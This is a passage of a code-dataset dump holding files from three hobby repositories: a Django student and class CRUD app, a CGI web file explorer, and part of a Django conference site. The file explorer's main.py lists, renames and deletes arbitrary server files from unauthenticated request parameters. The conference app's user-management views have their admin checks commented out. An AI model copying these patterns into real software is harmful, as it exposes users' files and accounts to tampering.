"content_id": "3e85ebd0b25c2044d45c6d00e6aab0b84201c36a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 129,
"license_type": "no_license",
"max_line_length": 38,
"num_lines": 6,
"path": "/alunos/admin.py",
"repo_name": "brenothales/crud-django",
"src_encoding": "UTF-8",
"text": "from django.contrib import admin\nfrom alunos.models import Turma, Aluno\n\n\nadmin.site.register(Turma)\nadmin.site.register(Aluno)\n\n"
},
{
"alpha_fraction": 0.6041666865348816,
"alphanum_fraction": 0.6041666865348816,
"avg_line_length": 30.91666603088379,
"blob_id": "8c3af928b6786afa63d888552063c72f4bfb6586",
"content_id": "485d2c311933c17e5d75f11762f5292ffd9616b4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 384,
"license_type": "no_license",
"max_line_length": 67,
"num_lines": 12,
"path": "/turmas/urls.py",
"repo_name": "brenothales/crud-django",
"src_encoding": "UTF-8",
"text": "from django.conf.urls import patterns, include, url\n\nfrom . import views\n\n\nurlpatterns = patterns('turmas.views',\n # url(r'^', 'lista', name='lista'),\n url(r'^lista', 'lista', name='lista'),\n url(r'^create/$', 'create', name='create'),\n url(r'^delete/(?P<codigoTurma>\\d+)$', 'delete', name='delete'),\n url(r'^update/(?P<codigoTurma>\\d+)$', 'update', name='update'),\n)\n\n"
},
{
"alpha_fraction": 0.680115282535553,
"alphanum_fraction": 0.680115282535553,
"avg_line_length": 22.200000762939453,
"blob_id": "56db7a00fc65d40dc69c7ad4d51bd4fabe137d4a",
"content_id": "a414b7113c86ab3a8e81188a37462388bc938d13",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 347,
"license_type": "no_license",
"max_line_length": 66,
"num_lines": 15,
"path": "/turmas/forms.py",
"repo_name": "brenothales/crud-django",
"src_encoding": "UTF-8",
"text": "from django.forms import ModelForm\nfrom alunos.models import Aluno\nfrom alunos.models import Turma\n\n\n\nclass AlunoForm(ModelForm):\n class Meta:\n \tmodel = Aluno\n \tfields = ['nomeAluno', 'cpf','telefone', 'dataNasc', 'turma']\n\nclass TurmaForm(ModelForm):\n class Meta:\n model = Turma\n fields = ['nomeTurma', 'descricaoTurma']"
},
{
"alpha_fraction": 0.7282463312149048,
"alphanum_fraction": 0.7289156913757324,
"avg_line_length": 26.648147583007812,
"blob_id": "d477b5de65d649bead9b2cba23d4bfb1ec92ebe2",
"content_id": "c8d6a9d122bad76e385189bfb9e2e77424d05d24",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1494,
"license_type": "no_license",
"max_line_length": 78,
"num_lines": 54,
"path": "/alunos/views.py",
"repo_name": "brenothales/crud-django",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\nfrom django.shortcuts import render_to_response\nfrom django.template import RequestContext\nfrom django.http import HttpResponseRedirect\nfrom forms import AlunoForm\nfrom alunos.models import Aluno\nfrom django.shortcuts import render, redirect\nfrom alunos.models import Aluno\nfrom alunos.forms import AlunoForm\n\n\ndef lista(request):\n\talunos = Aluno.objects.all()\n\tcontext = RequestContext(request, {'alunos': alunos})\n\treturn render_to_response('aluno/list.html', context)\n\n\ndef create(request):\n\tform = AlunoForm(request.POST or None)\n\t\n\tif request.method == 'POST' and form.is_valid():\n\t\tform.save()\n\t\treturn redirect('/alunos/')\n\n\tcontext = RequestContext(request, {'form': form})\n\treturn render_to_response('aluno/create.html', context)\n\n\ndef delete(request, codigoAluno):\n aluno = Aluno.objects.get(pk=codigoAluno)\n\n if request.method == \"POST\":\n aluno.delete()\n return HttpResponseRedirect('/alunos/')\n\n context = RequestContext(request, {'aluno': aluno})\n return render_to_response('aluno/delete.html', context)\n\n\ndef update(request, codigoAluno):\n\talunos = Aluno.objects.get(pk=codigoAluno)\n\t\n\tif request.method == 'POST':\n\t\tform = AlunoForm(request.POST, instance=alunos)\n\n\t\tif form.is_valid():\n\t\t\tform.save()\n\t\t\treturn HttpResponseRedirect('/alunos/')\n\n\telse:\n\t\tform = AlunoForm(instance=alunos)\n\t\t\n\tcontext = RequestContext(request, {'form': form, 'codigoAluno': codigoAluno})\n\treturn render_to_response('aluno/update.html', context)\t\n"
},
{
"alpha_fraction": 0.6409952640533447,
"alphanum_fraction": 0.6540284156799316,
"avg_line_length": 28.034482955932617,
"blob_id": "f85f998cb0260c5c7df8b450da6e95fec6676287",
"content_id": "ebb5c566a2176b3e070dbd0930e28639115c543d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 844,
"license_type": "no_license",
"max_line_length": 69,
"num_lines": 29,
"path": "/alunos/models.py",
"repo_name": "brenothales/crud-django",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\nfrom django.db import models\n\nclass Aluno(models.Model):\n\n codigoAluno = models.IntegerField(primary_key=True) \n nomeAluno = models.CharField('Nome completo', max_length=200)\n cpf = models.CharField('CPF', max_length=14, unique=True)\n telefone = models.CharField('Telefone', max_length=(11))\n dataNasc = models.DateField('Data de nascimento')\n\n turma = models.ForeignKey('Turma')\n\n def __unicode__(self):\n return self.nomeAluno\n\nclass Turma(models.Model):\n \n codigoTurma = models.IntegerField(primary_key=True) \n nomeTurma = models.CharField('Nome completo', max_length=200)\n descricaoTurma = models.TextField()\n\n\n class Meta:\n verbose_name = u'Turma'\n verbose_name_plural = u'Turmas'\n\n def __unicode__(self):\n return self.nomeTurma\n\n\n"
},
{
"alpha_fraction": 0.5300072431564331,
"alphanum_fraction": 0.537960946559906,
"avg_line_length": 33.57500076293945,
"blob_id": "cc06cdd6a7dd39417504ef1c855081849aadd44d",
"content_id": "0e41a267b7edc9e6e1fb950e3aa9b3132215a591",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1383,
"license_type": "no_license",
"max_line_length": 95,
"num_lines": 40,
"path": "/turmas/migrations/0001_initial.py",
"repo_name": "brenothales/crud-django",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='Aluno',\n fields=[\n ('codigoAluno', models.IntegerField(serialize=False, primary_key=True)),\n ('nomeAluno', models.CharField(max_length=200, verbose_name=b'Nome completo')),\n ('cpf', models.CharField(unique=True, max_length=14, verbose_name=b'CPF')),\n ('telefone', models.CharField(max_length=11, verbose_name=b'Telefone')),\n ('dataNasc', models.DateField(verbose_name=b'Data de nascimento')),\n ],\n ),\n migrations.CreateModel(\n name='Turma',\n fields=[\n ('codigoTurma', models.IntegerField(serialize=False, primary_key=True)),\n ('nomeTurma', models.CharField(max_length=200, verbose_name=b'Nome da turma')),\n ('descricaoTurma', models.TextField()),\n ],\n options={\n 'verbose_name': 'Turma',\n 'verbose_name_plural': 'Turmas',\n },\n ),\n migrations.AddField(\n model_name='aluno',\n name='turma',\n field=models.ForeignKey(to='turmas.Turma'),\n ),\n ]\n"
},
{
"alpha_fraction": 0.8020833134651184,
"alphanum_fraction": 0.8020833134651184,
"avg_line_length": 17.799999237060547,
"blob_id": "15bb8c21491796507afcf4dfd6452c12c9c1640d",
"content_id": "7f26d34e363eca1ca2586b28fc3636b629b3f803",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 96,
"license_type": "no_license",
"max_line_length": 32,
"num_lines": 5,
"path": "/turmas/admin.py",
"repo_name": "brenothales/crud-django",
"src_encoding": "UTF-8",
"text": "from django.contrib import admin\nfrom turmas.models import Turma\n\n\nadmin.site.register(Turma)\n\n\n"
},
{
"alpha_fraction": 0.6618357300758362,
"alphanum_fraction": 0.6618357300758362,
"avg_line_length": 30.846153259277344,
"blob_id": "597b84f958be39df35542025f70787c4103c10d3",
"content_id": "824360bb7e69d2a193a63519e64360257a58f0b3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 414,
"license_type": "no_license",
"max_line_length": 65,
"num_lines": 13,
"path": "/djangotest/urls.py",
"repo_name": "brenothales/crud-django",
"src_encoding": "UTF-8",
"text": "from django.conf.urls import patterns, include, url\n\nfrom django.contrib import admin\nadmin.autodiscover()\n\nurlpatterns = patterns('',\n\n url(r'^blog/', include('core.urls', namespace='core')),\n url(r'^alunos/', include('alunos.urls', namespace='alunos')),\n url(r'^turmas/', include('turmas.urls', namespace='turmas')),\n url(r'^', include('core.urls')),\n url(r'^admin/', include(admin.site.urls)),\n)\n"
},
{
"alpha_fraction": 0.7291527390480042,
"alphanum_fraction": 0.7298198938369751,
"avg_line_length": 26.740739822387695,
"blob_id": "f26a278a3b7a744e40c80889837d26fe25e848f9",
"content_id": "4ce40974ebcb2097c5c9ec34524765eb65a983c6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1499,
"license_type": "no_license",
"max_line_length": 78,
"num_lines": 54,
"path": "/turmas/views.py",
"repo_name": "brenothales/crud-django",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\nfrom django.shortcuts import render_to_response\nfrom django.template import RequestContext\nfrom django.http import HttpResponseRedirect\nfrom forms import TurmaForm\nfrom turmas.models import Turma\nfrom django.shortcuts import render, redirect\nfrom turmas.models import Turma\nfrom turmas.forms import TurmaForm\n\n\ndef lista(request):\n\tturmas = Turma.objects.all()\n\tcontext = RequestContext(request, {'turmas': turmas})\n\treturn render_to_response('turma/list.html', context)\n\n\ndef create(request):\n\tform = TurmaForm(request.POST or None)\n\t\n\tif request.method == 'POST' and form.is_valid():\n\t\tform.save()\n\t\treturn redirect('/turmas/lista')\n\n\tcontext = RequestContext(request, {'form': form})\n\treturn render_to_response('turma/create.html', context)\n\n\ndef delete(request, codigoTurma):\n turma = Turma.objects.get(pk=codigoTurma)\n\n if request.method == \"POST\":\n turma.delete()\n return HttpResponseRedirect('/turmas/')\n\n context = RequestContext(request, {'turma': turma})\n return render_to_response('turma/delete.html', context)\n\n\ndef update(request, codigoTurma):\n\tturmas = Turma.objects.get(pk=codigoTurma)\n\t\n\tif request.method == 'POST':\n\t\tform = TurmaForm(request.POST, instance=turmas)\n\n\t\tif form.is_valid():\n\t\t\tform.save()\n\t\t\treturn HttpResponseRedirect('/turmas/')\n\n\telse:\n\t\tform = TurmaForm(instance=turmas)\n\t\t\n\tcontext = RequestContext(request, {'form': form, 'codigoTurma': codigoTurma})\n\treturn render_to_response('turma/update.html', context)\t\n"
}
] | 9 |
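The urls.py modules in the crud-django record above use `django.conf.urls.patterns()` with string view names, an API that was deprecated in Django 1.8 and removed in 1.10, so this code only runs on old releases. A hypothetical port of the `turmas` routes to a modern release (assumes Django >= 2.0, where `django.urls.path` is available):

```python
# Hypothetical port of turmas/urls.py above to Django >= 2.0, where
# patterns() no longer exists: views are imported and referenced directly,
# and the <int:...> converter replaces the (?P<codigoTurma>\d+) regex group.
from django.urls import path

from . import views

urlpatterns = [
    path("lista", views.lista, name="lista"),
    path("create/", views.create, name="create"),
    path("delete/<int:codigoTurma>", views.delete, name="delete"),
    path("update/<int:codigoTurma>", views.update, name="update"),
]
```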
eszepto/fileexploror | https://github.com/eszepto/fileexploror | 0db30b53397a7021f7ec6bf1ba217d8bd8a1e362 | c4df180928e50a5098562229458aa6cd118b2dc0 | f10833321c95d5f00fa52ea3c314d400d1f6ca8d | refs/heads/master | 2021-07-06T16:55:31.661921 | 2021-01-16T14:21:25 | 2021-01-16T14:21:25 | 222747631 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.4673157036304474,
"alphanum_fraction": 0.47148817777633667,
"avg_line_length": 19.724637985229492,
"blob_id": "f6e14ab0ed6b5bdb8412d64fa786c11397406597",
"content_id": "3798f34a1996bd1133bb96980e981032306a7ce4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1438,
"license_type": "no_license",
"max_line_length": 93,
"num_lines": 69,
"path": "/cgi-bin/anypage.py",
"repo_name": "eszepto/fileexploror",
"src_encoding": "UTF-8",
"text": "import sys,os\nimport cgi, cgitb\nimport urllib.parse\nprint(\"Content-type:text/html\\r\\n\\r\\n\\n\")\nform = cgi.FieldStorage() \nuser_path = form.getvalue('path')\n\n\ndef GetPrevPath(current_path):\n return current_path[::-1].split('/',maxsplit=1)[1][::-1]\ndef main(current_path=\"C:/\"):\n \n current_path = current_path.replace('\\\\','/')\n \n html = \"\"\n\n html += \"<html>\" + \"\\n\"\n html += \"<head></head>\" + \"\\n\"\n html += \"<body>\" + \"\\n\"\n\n html += \"<h1>%s</h1>\" %(current_path) + \"\\n\"\n html += '<br/>' + \"\\n\"\n \n html+=\"\"\"\n <form action=/cgi-bin/main.py >\n\n <input type=\"text\" name=\"path\"/>\n \n <input type = \"submit\" value = \"GO\" />\n\n </form>\n\n \"\"\"\n prev_path = GetPrevPath(current_path)\n if (prev_path == \"C:/\"):\n html += \"\"\"\n \n <form action=/cgi-bin/anypage.py?path=%s>\n\n <input type=\"submit\" value=\"<\" />\n\n </form>\n \"\"\" %(prev_path)\n else:\n html += \"\"\"\n \n <form action=/cgi-bin/main.py >\n\n <input type=\"submit\" value=\"<\" />\n\n </form>\n \"\"\" \n \n\n for i in os.listdir(current_path):\n html += '<a href=\"/cgi-bin/main.py?path=%s\"> %s </a>' %(current_path+\"/\"+i, i) + \"\\n\"\n html += '<br/>' + \"\\n\"\n \n\n html += \"</body>\" + \"\\n\"\n html += \"</html>\" + \"\\n\"\n \n return html\n \nif(user_path == None):\n print(main())\nelse:\n print(user_path)\n print(main(user_path))\n\n\n\n \n"
},
{
"alpha_fraction": 0.4823633134365082,
"alphanum_fraction": 0.485890656709671,
"avg_line_length": 17.57377052307129,
"blob_id": "5045886d6a6269b7a8214bab732b2e7efcc11a11",
"content_id": "c7e657aa09940963fb9806dbfc5ee3558359bd44",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1134,
"license_type": "no_license",
"max_line_length": 52,
"num_lines": 61,
"path": "/cgi-bin/2.py",
"repo_name": "eszepto/fileexploror",
"src_encoding": "UTF-8",
"text": "import sys,os\nimport cgi, cgitb\nprint(\"Content-type:text/html\\r\\n\\r\\n\\n\")\nform = cgi.FieldStorage() \nuser_path = form.getvalue('path')\n\nprev_path = os.path.abspath(\"../\")\n\ndef main(current_path=os.getcwd()):\n \n current_path = current_path.replace('\\\\','/')\n \n html = \"\"\n\n html += \"<html>\" + \"\\n\"\n html += \"<head></head>\" + \"\\n\"\n html += \"<body>\" + \"\\n\"\n\n html += \"<h1>%s</h1>\" %(current_path) + \"\\n\"\n html += '<br/>' + \"\\n\"\n \n html+=\"\"\"\n <form action=/cgi-bin/2.py >\n\n <input type=\"text\" name=\"path\"/>\n \n <input type = \"submit\" value = \"GO\" />\n\n </form>\n\n \"\"\"\n html += \"\"\"\n \n <form action=/cgi-bin/2.py >\n\n <input type=\"submit\" value=\"<\"/>\n\n </form>\n \"\"\"\n\n for i in os.listdir(current_path):\n html += '<a href=\"/%s\">%s</a>' %(i,i) + \"\\n\"\n html += '<br/>' + \"\\n\"\n \n\n html += \"</body>\" + \"\\n\"\n html += \"</html>\" + \"\\n\"\n \n return html\n \nif(user_path == None):\n print(main())\nelse:\n print(user_path)\n print(main(user_path))\n\n\ndef GetPrevPath(current_path):\n current_path = str(current_path).split('/')\n pass\n return\n\n"
},
{
"alpha_fraction": 0.7547169923782349,
"alphanum_fraction": 0.7547169923782349,
"avg_line_length": 16.66666603088379,
"blob_id": "ea5e43a298ee975654691f241d3391529bfcc93b",
"content_id": "aaa3ef1cded404175c6e664497b9a092dfaea4cf",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 53,
"license_type": "no_license",
"max_line_length": 36,
"num_lines": 3,
"path": "/README.md",
"repo_name": "eszepto/fileexploror",
"src_encoding": "UTF-8",
"text": "# fileexploror\n\nfirst webpage is in /cgi-bin/main.py\n"
},
{
"alpha_fraction": 0.4296296238899231,
"alphanum_fraction": 0.4333333373069763,
"avg_line_length": 20.600000381469727,
"blob_id": "bcbe31ca8d946bb3da6be9e562ef774dab3ab2db",
"content_id": "bffb6ee5d37d3087174294855680c2e2459a4aaa",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 540,
"license_type": "no_license",
"max_line_length": 54,
"num_lines": 25,
"path": "/cgi-bin/index.py",
"repo_name": "eszepto/fileexploror",
"src_encoding": "UTF-8",
"text": "import sys,os\nprint(\"Content-type:text/html\\r\\n\\r\\n\")\nprev_path = os.path.abspath(\"../\")\ndef main(current_path=os.getcwd()):\n html = \"\"\n\n html += \"<html>\" + \"\\n\"\n html += \"<head></head>\" + \"\\n\"\n html += \"<body>\" + \"\\n\"\n\n html += \"<h1>%s</h1>\" %(current_path) + \"\\n\"\n html += '<br/>' + \"\\n\"\n \n for i in os.listdir(current_path):\n html += '<a href=\"../%s\">%s</a>' %(i,i) + \"\\n\"\n html += '<br/>' + \"\\n\"\n \n\n html += \"</body>\" + \"\\n\"\n html += \"</html>\" + \"\\n\"\n \n return html\n \n\nprint(main())\n"
},
{
"alpha_fraction": 0.5120179057121277,
"alphanum_fraction": 0.5190982222557068,
"avg_line_length": 31.713415145874023,
"blob_id": "7f49ad79c65d335fc46ef266c801494c7d32619e",
"content_id": "bb58f82881b5efc0f361a962813cd2ea6200b635",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5367,
"license_type": "no_license",
"max_line_length": 136,
"num_lines": 164,
"path": "/cgi-bin/main.py",
"repo_name": "eszepto/fileexploror",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python\n\nimport sys,os\nimport cgi, cgitb\nimport urllib.parse\nimport time\nprint(\"Content-type:text/html\\r\\n\\r\\n\\n\")\nsuffixes = ['B', 'KB', 'MB', 'GB', 'TB', 'PB']\ndef humansize(nbytes):\n i = 0\n while nbytes >= 1024 and i < len(suffixes)-1:\n nbytes /= 1024.\n i += 1\n f = ('%.2f' % nbytes).rstrip('0').rstrip('.')\n return '%s %s' % (f, suffixes[i])\n\ndef main(current_path= str(os.path.dirname(os.path.abspath(__file__))).split('\\\\')[0]+\"/\"):\n \n current_path = current_path.replace('\\\\','/')\n\n html = \"\"\n html += \"<html>\" + \"\\n\"\n \n html += '<head>'\n html += '<meta charset=\"UTF-8\" />'\n html += '<link rel=\"stylesheet\" href=\"/styles.css\">'\n html += '</head>' + \"\\n\"\n \n html += \"<body>\" + \"\\n\"\n\n html += \"<h4>%s</h4>\" %(current_path) + \"\\n\"\n html += '<br/>' + \"\\n\"\n \n #Home button\n html += \"\"\"\n <form action='main.py?path=' method=\"POST\" >\n <input type=\"submit\" value=\"Home\" />\n </form>\n \"\"\" \n \n #back Button\n html += \"\"\" \n <form action=\"/cgi-bin/main.py\" method=\"GET\" >\n <input type=\"hidden\" name=\"path\" value=\"%s\" />\n <input type=\"submit\" value=\"Back\" />\n </form>\n \"\"\"%(os.path.abspath(current_path+\"/..\").replace('\\\\','/')) \n \n #go to dir button\n html+=\"\"\"\n <form action='main.py' >\n <input type=\"text\" name=\"path\" placeholder=\"Enter the path\"/>\n <input type = \"submit\" value = \"GO\" />\n </form> \n \"\"\" \n #SystemFileCheckBox\n html += '<input type=\"checkbox\" id=\"SystemFileCheckBox\" checked>hide systemfile</input>'\n \n html += \"<hr>\"\n\n html += '<table cellspacing=\"0\" border=\"0\" id=\"tblDisplay\" cellpading=\"0\">'\n html += \"<thead>\"\n html += '<tr id=\"HeaderRow\">' \n\n html += '<th><input type=\"checkbox\" id=\"SelectAllBox\"/></th>'\n html += \"<th></th>\"\n html += '<th><b onclick=\"SortByName()\">filename</b></th>'\n html += \"<th> </th>\"\n html += \"<th><b>date modified</b></th>\"\n html += \"<th> </th>\"\n html += \"<th><b>size</b></th>\"\n\n html += \"</tr>\"\n html += \"</thead>\"\n \n html += \"<tbody>\"\n html += \"\"\n for i in os.scandir(current_path):\n info = i.stat()\n \n if(i.name[0] == \"$\" or \n i.name[0] == \".\" or\n i.name.lower().startswith(\"boot\") or\n i.name.lower().endswith(\".sys\")):\n \n html += '<tr class=\"ItemTr SystemItem\" hidden>'\n else:\n html += '<tr class=\"ItemTr\">'\n html += '<td><input type=\"checkbox\" class=\"checky\" value=\"%s\" name=\"checkedItem\"/></td>'%i.name\n \n if i.is_dir(): #if is folder, won't show size\n html += \"<td>📁</td>\" # Folder icon\n html += '<td><a href=\"/cgi-bin/main.py?path=%s\">%s<a></td>' %(os.path.join(current_path, i.name).replace(\"\\\\\",\"/\"), i.name) \n html += \"<td> </td>\"\n html += \"<td> %s </td>\" %(time.strftime('%d/%m/%Y %H:%M', time.localtime(info.st_mtime))) \n html += \"<td> </td>\"\n html += \"<td> </td>\"\n elif (i.is_file):\n html += \"<td>📄</td>\" # File icon\n html += '<td><a href=\"%s\">%s</a></td>'%(os.path.join(current_path, i.name).replace(\"\\\\\",\"/\"), i.name)\n html += \"<td> </td>\"\n html += \"<td> %s </td>\" %(time.strftime('%d/%m/%Y %H:%M', time.localtime(info.st_mtime))) \n html += \"<td> </td>\"\n html += \"<td> %s </td>\" %(humansize(info.st_size))\n\n html += \"</tr>\"\n\n html += \"</tbody>\"\n\n html += \"</table>\" + \"\\n\"\n html += '<script type=\"text/javascript\" src=\"http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js\"></script>'\n html += '<script type=\"text/javascript\" 
src=\"/eventhandler.js\"></script>'\n html += \"<hr>\"\n html+=\"\"\"\n <div >\n <form action=\"/cgi-bin/editFile.py\" target='_blank'>\n <input type=\"hidden\" name=\"path\" class=\"rename\" value=\"%s\" >\n <input type=\"hidden\" name=\"editAction\" class=\"rename\" value=\"rename\">\n <input type=\"hidden\" name=\"selectedfile\" id=\"selectedfile\" class=\"rename\" >\n <input type=\"text\" name=\"newName\" class=\"rename\" placeholder=\"Enter a new name\" hidden/>\n \n <input type = \"submit\" class=\"rename\" id=\"renameBtn\" value = \"Rename\" hidden/>\n </form>\n \"\"\"%(current_path)\n\n html+=\"\"\"\n <form style=\"float: left; padding: 5px;\">\n <input type = \"submit\" name=\"edit\" class=\"delete\" id=\"deleteBtn\" value = \"Delete\" hidden/>\n </form>\n </div>\n \"\"\" \n html += \"</body>\" + \"\\n\"\n \n \n html += \"</html>\" + \"\\n\"\n return html\n\n\nform = cgi.FieldStorage() \nuser_path = form.getvalue('path')\nnewName = form.getvalue('newName')\nselectFile = form.getvalue('checkedItem')\neditAction = form.getvalue('edit')\n\nif(user_path == None):\n print(main())\nelif(editAction == \"Rename\"):\n if(newName != None):\n currentPath= user_path\n oldName = os.path.join(currentPath, selectFile)\n newName = os.path.join(currentPath, newName)\n os.rename(oldName, newName)\n print(main(user_path))\nelif(editAction == \"Delete\"):\n currentPath = os.path.join(user_path, selectFile)\n if os.path.isdir(currentPath):\n os.rmdir(currentPath)\n else:\n os.remove(currentPath)\n print(main(user_path))\nelse:\n print(main(user_path))\n\nprint()\n\n\n"
}
] | 5 |
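The CGI scripts in the fileexploror record above pass the user-supplied `path` query parameter straight to `os.listdir()`, so any readable directory on the machine can be listed. If the explorer were ever exposed beyond localhost, a usual hardening step (not present in the repo) is to resolve the requested path and confirm it stays under one allowed root; a sketch, with `ALLOWED_ROOT` a hypothetical root mirroring the script's `C:/` default:

```python
# Sketch of a containment check for user-supplied paths; ALLOWED_ROOT is a
# hypothetical root mirroring the "C:/" default in cgi-bin/main.py above.
from pathlib import Path

ALLOWED_ROOT = Path("C:/")

def is_allowed(user_path: str) -> bool:
    try:
        resolved = Path(user_path).resolve(strict=True)  # follows .. and symlinks
    except OSError:
        return False  # nonexistent or unreadable path
    return resolved == ALLOWED_ROOT or ALLOWED_ROOT in resolved.parents

print(is_allowed("C:/Windows"))    # True on a typical Windows layout
print(is_allowed("../../../etc"))  # False: escapes the allowed root
```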
mateuszgrzyb/confexplore | https://github.com/mateuszgrzyb/confexplore | af0a3e82f25590102d580021c6761eda0bdb87a0 | 9dc1c7bab7a94806cbe498a27fbb6bf103b99cec | abe8984b3975ac4aeb6f3b6a8a480bcfb73d7b86 | refs/heads/master | 2023-02-24T18:15:08.341043 | 2021-01-25T20:50:48 | 2021-01-25T20:50:48 | 322600648 | 0 | 1 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6628352403640747,
"alphanum_fraction": 0.6649250984191895,
"avg_line_length": 28.597938537597656,
"blob_id": "b15315eb1a2f03aa390cc1ce68d5afabe8e0003a",
"content_id": "2f4197b3764dadd998d2d0bb4de2837c1f1c0b12",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2876,
"license_type": "no_license",
"max_line_length": 73,
"num_lines": 97,
"path": "/users/views.py",
"repo_name": "mateuszgrzyb/confexplore",
"src_encoding": "UTF-8",
"text": "from django.contrib.auth import logout\nfrom django.contrib.auth.mixins import LoginRequiredMixin\nfrom django.contrib.auth.mixins import UserPassesTestMixin\nfrom django.contrib.auth.views import LoginView as BaseLoginView\nfrom django.http import HttpResponseRedirect, HttpRequest, HttpResponse\nfrom django.shortcuts import render, redirect\n\n# Create your views here.\nfrom django.urls import reverse_lazy\nfrom django.views import View\nfrom django.views.generic import CreateView\n\n# from users.forms import RegistrationForm\n\n# ---------------------\nfrom django.shortcuts import render, redirect\nfrom django.contrib import messages\nfrom django.views.generic import TemplateView\n\nfrom .forms import UserRegisterForm\nfrom .models import Profile\n\n\nclass LoginView(BaseLoginView):\n template_name = 'users/login.html'\n\n\ndef register_view(request):\n if request.method == 'POST':\n form = UserRegisterForm(request.POST)\n if form.is_valid():\n form.save()\n username = form.cleaned_data.get('username')\n if form.cleaned_data.get('rodzaj_użytkownika') == '1':\n # opcja zwykłego użytkownika \n print(1)\n if form.cleaned_data.get('rodzaj_użytkownika') == '2':\n # opcja wolontriusza \n print(2)\n if form.cleaned_data.get('rodzaj_użytkownika') == '3':\n # opcja organizatora \n print(1)\n messages.success(request, f'Account created for {username}!')\n return redirect('home')\n else:\n form = UserRegisterForm()\n return render(request, 'users/register.html', {'form': form})\n\n\n# class RegisterView(CreateView):\n# pass\n# form_class = RegistrationForm\n# success_url = reverse_lazy('home')\n# template_name = 'users/register.html'\n#\n# def form_valid(self, form: RegistrationForm) -> HttpResponseRedirect:\n# valid = super(RegisterView, self).form_valid(form)\n# return valid\n\n\nclass LogoutView(View):\n def get(self, request: HttpRequest) -> HttpResponse:\n logout(request)\n return redirect('login')\n\n\nclass ResetPasswordView(View):\n pass\n\n\nclass AdminRequiredMixin(LoginRequiredMixin, UserPassesTestMixin):\n def test_func(self):\n return self.request.user.role_name == 'A'\n\n\nclass ManageUsersView(\n #AdminRequiredMixin,\n TemplateView):\n\n template_name = 'users/manageusers.html'\n extra_context = {\n 'profiles': Profile.objects.exclude(role_name='A')\n }\n\n\nclass ConfirmUserView(\n #AdminRequiredMixin,\n View):\n def post(self, request: HttpRequest) -> HttpResponse:\n pk = request.POST[\"pk\"]\n print(request.POST)\n p: Profile = Profile.objects.get(pk=pk)\n r = p.get_role()\n print(f'\\n\\nCONFIRM USER PK: {pk}')\n r.blocked = not r.blocked\n r.save()\n return redirect('manage_users')\n"
},
{
"alpha_fraction": 0.47211897373199463,
"alphanum_fraction": 0.49070632457733154,
"avg_line_length": 23.454545974731445,
"blob_id": "722e0841874405b934aebb596bb69aa650d08dc6",
"content_id": "a9884002e83d80a806893ed3d0e72ed5e2ddf751",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "HTML",
"length_bytes": 269,
"license_type": "no_license",
"max_line_length": 59,
"num_lines": 11,
"path": "/templates/misc/faq.html",
"repo_name": "mateuszgrzyb/confexplore",
"src_encoding": "UTF-8",
"text": "{% extends 'main.html' %}\n{% block content %}\n <div class=\"jumbotron mt-5\">\n <h2>FAQ</h2><br>\n {% for point in faq %}\n <h4>{{ forloop.counter }}. {{ point.question }}?</h4>\n <p>{{ point.answer }}</p>\n <br>\n {% endfor %}\n </div>\n{% endblock %}\n"
},
{
"alpha_fraction": 0.6175024509429932,
"alphanum_fraction": 0.6184857487678528,
"avg_line_length": 29.133333206176758,
"blob_id": "e702d0b42f5f42cec0a837e11f8d5999c2051c30",
"content_id": "f1946704f3d36ef3fc98f55e84f1a272504583e6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4068,
"license_type": "no_license",
"max_line_length": 70,
"num_lines": 135,
"path": "/content/views.py",
"repo_name": "mateuszgrzyb/confexplore",
"src_encoding": "UTF-8",
"text": "from django.contrib.auth.mixins import LoginRequiredMixin\nfrom django.contrib.auth.models import AnonymousUser\nfrom django.http import HttpResponse, HttpRequest\nfrom django.shortcuts import render\n\n# Create your views here.\nfrom django.urls import reverse\nfrom django.urls import reverse_lazy\nfrom django.views import View\nfrom django.views.generic import FormView\n\nfrom .forms import AddEventForm\nfrom .models import Event, City, Type\n\n\n\nclass LoggedView(LoginRequiredMixin, View):\n login_url = reverse_lazy('login')\n\n\n# def wrapper(context: dict, request: HttpRequest) -> dict:\n# context['types'] = Type.objects.all()\n#\n# context['cities'] = City.objects.all()\n#\n# try:\n# context['user_type'] = request.user.profile.get_role()\n# except AttributeError:\n# pass\n# return context\n\n\nclass HomeView(View):\n def get(self, request: HttpRequest):\n context = {\n 'events': Event.objects.all()\n }\n return render(request, 'content/home.html', context)\n\n def post(self, request: HttpRequest):\n keys = ['name', 'type', 'city', 'events']\n kwars = {key: request.POST[key] for key in keys}\n html = \"\\n\".join(f'<p>{k}: 